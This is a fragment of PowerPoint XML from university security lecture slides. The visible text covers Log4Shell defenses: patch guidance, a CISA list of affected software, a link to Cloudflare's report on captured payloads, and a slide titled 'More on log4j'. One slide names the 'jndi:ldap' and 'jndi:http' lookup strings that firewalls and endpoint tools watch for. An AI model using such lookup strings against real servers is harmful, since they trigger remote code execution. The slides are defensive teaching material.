                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WAF/IPS/EDR/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> looking for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jndi:http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> calls/connections to known bad IP addresses/DNS names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable JNDI calls in Java (easy... If you know where to set the config!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0"/>
              <a:t>PATCH ALL THE THINGS!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251878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FF71-0592-0442-AC8E-B8F28D5AD4E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More on log4j</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A372E8FD-532A-1B4E-899B-63B5E1D17003}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cloudflare report on actual payloads captured in the wild - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25270067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Adjacency.thmx</Template>
  <TotalTime>1615</TotalTime>
  <Words>4845</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>476</Paragraphs>
  <Slides>98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Cambria</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Gotham-Book</vt:lpstr>
      <vt:lpstr>Adjacency</vt:lpstr>
      <vt:lpstr>ENPM685: Information Security Tools</vt:lpstr>
      <vt:lpstr>Anatomy of an Attack</vt:lpstr>
      <vt:lpstr>https://twitter.com/Skvern0/status/1115885488165019650</vt:lpstr>
      <vt:lpstr>The Threat Landscape</vt:lpstr>
      <vt:lpstr>Attacker Motivations</vt:lpstr>
      <vt:lpstr>Phases of an attack</vt:lpstr>
      <vt:lpstr>Dwell Time</vt:lpstr>
      <vt:lpstr>The “Cyber Kill Chain”</vt:lpstr>
      <vt:lpstr>“Cyber Kill Chain”</vt:lpstr>
      <vt:lpstr>“Cyber Kill Chain”</vt:lpstr>
      <vt:lpstr>“Cyber Kill Chain”</vt:lpstr>
      <vt:lpstr>APT</vt:lpstr>
      <vt:lpstr>  </vt:lpstr>
      <vt:lpstr>Attack characteristics</vt:lpstr>
      <vt:lpstr>Scanning </vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>We’re not done yet!</vt:lpstr>
      <vt:lpstr>MITRE ATT&amp;CK</vt:lpstr>
      <vt:lpstr>https://mitre-attack.github.io/attack-navigator/ </vt:lpstr>
      <vt:lpstr>MITRE ATT&amp;CK</vt:lpstr>
      <vt:lpstr>Case Study: Shark Tank  Phishing</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Case Study: ”Google Docs” phish</vt:lpstr>
      <vt:lpstr>Legit</vt:lpstr>
      <vt:lpstr>Not legit</vt:lpstr>
      <vt:lpstr>OAuth request</vt:lpstr>
      <vt:lpstr>The “Google Docs” app</vt:lpstr>
      <vt:lpstr>Eugene Popov?</vt:lpstr>
      <vt:lpstr>The Impact on Google</vt:lpstr>
      <vt:lpstr>The reddit effect</vt:lpstr>
      <vt:lpstr>What Google did to resolve</vt:lpstr>
      <vt:lpstr>This attack has been discussed before…</vt:lpstr>
      <vt:lpstr>The impact on UMD</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Do a periodic review of what you allow to your Google Account</vt:lpstr>
      <vt:lpstr>Case Study: Major retailer hack</vt:lpstr>
      <vt:lpstr>Case Study: Major retailer hack</vt:lpstr>
      <vt:lpstr>Major retailer attack</vt:lpstr>
      <vt:lpstr>Retailer – Lessons Learned</vt:lpstr>
      <vt:lpstr>Case Study: University hack</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Case Study: University hack</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Case Study: University hack</vt:lpstr>
      <vt:lpstr>More info on this “APT”</vt:lpstr>
      <vt:lpstr>University – Lessons Learned</vt:lpstr>
      <vt:lpstr>”The January Incident”</vt:lpstr>
      <vt:lpstr>59 systems and a review of 2.5+ months of logs later...</vt:lpstr>
      <vt:lpstr>The Attackers</vt:lpstr>
      <vt:lpstr>From a compromised system…</vt:lpstr>
      <vt:lpstr>From a compromised system…</vt:lpstr>
      <vt:lpstr>The Lessons Learned</vt:lpstr>
      <vt:lpstr>The Lessons Learned</vt:lpstr>
      <vt:lpstr>MSU Ransomware attack</vt:lpstr>
      <vt:lpstr>MSU Ransomware attack</vt:lpstr>
      <vt:lpstr>MSU Ransomware attack</vt:lpstr>
      <vt:lpstr>Attack Timeline</vt:lpstr>
      <vt:lpstr>Entry Point and What Came Next</vt:lpstr>
      <vt:lpstr>Who was behind the attack?</vt:lpstr>
      <vt:lpstr>Ransomware as a Service?</vt:lpstr>
      <vt:lpstr>IR Team Assemble!</vt:lpstr>
      <vt:lpstr>Disruption to Services</vt:lpstr>
      <vt:lpstr>Lost Productivity</vt:lpstr>
      <vt:lpstr>Data Encryption and Exfiltration</vt:lpstr>
      <vt:lpstr>Issues Discovered…</vt:lpstr>
      <vt:lpstr>"We’re Better than You"</vt:lpstr>
      <vt:lpstr>"We’re Better than You"</vt:lpstr>
      <vt:lpstr>“Going it Alone”</vt:lpstr>
      <vt:lpstr>“Going it Alone”</vt:lpstr>
      <vt:lpstr>"Productivity Trumping Security”</vt:lpstr>
      <vt:lpstr>"Productivity Trumping Security”</vt:lpstr>
      <vt:lpstr>Key Recommendations</vt:lpstr>
      <vt:lpstr>Key Recommendations</vt:lpstr>
      <vt:lpstr>You Can Keep Control</vt:lpstr>
      <vt:lpstr>Afterwards…</vt:lpstr>
      <vt:lpstr>Log4j (Log4Shell)</vt:lpstr>
      <vt:lpstr>log4j Is Probably Used On</vt:lpstr>
      <vt:lpstr>log4j – How It’s Supposed To Work</vt:lpstr>
      <vt:lpstr>log4j – The Vulnerability </vt:lpstr>
      <vt:lpstr>So Easy, Anyone Can Do It!</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>log4j Timeline (1 of 2)</vt:lpstr>
      <vt:lpstr>log4j Timeline (2 of 2)</vt:lpstr>
      <vt:lpstr>https://twitter.com/eastdakota/status/1469800951351427073 </vt:lpstr>
      <vt:lpstr>log4j Sample Attack</vt:lpstr>
      <vt:lpstr>log4j Sample Attack</vt:lpstr>
      <vt:lpstr>log4j Sample Attack</vt:lpstr>
      <vt:lpstr>log4j Sample Attack</vt:lpstr>
      <vt:lpstr>Patching Isn’t Always Easy</vt:lpstr>
      <vt:lpstr>Patching Isn’t Always Easy</vt:lpstr>
      <vt:lpstr>Java Package Management is Terrible</vt:lpstr>
      <vt:lpstr>log4j – Why This Is a Big Deal</vt:lpstr>
      <vt:lpstr>log4j Defenses</vt:lpstr>
      <vt:lpstr>More on log4j</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Tools for Information Security</dc:title>
  <dc:creator>Kevin Shivers</dc:creator>
  <cp:lastModifiedBy>Microsoft Office User</cp:lastModifiedBy>
  <cp:revision>290</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-08-11T16:54:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-19T03:52:29Z</dcterms:modified>
</cp:coreProperties>
</file>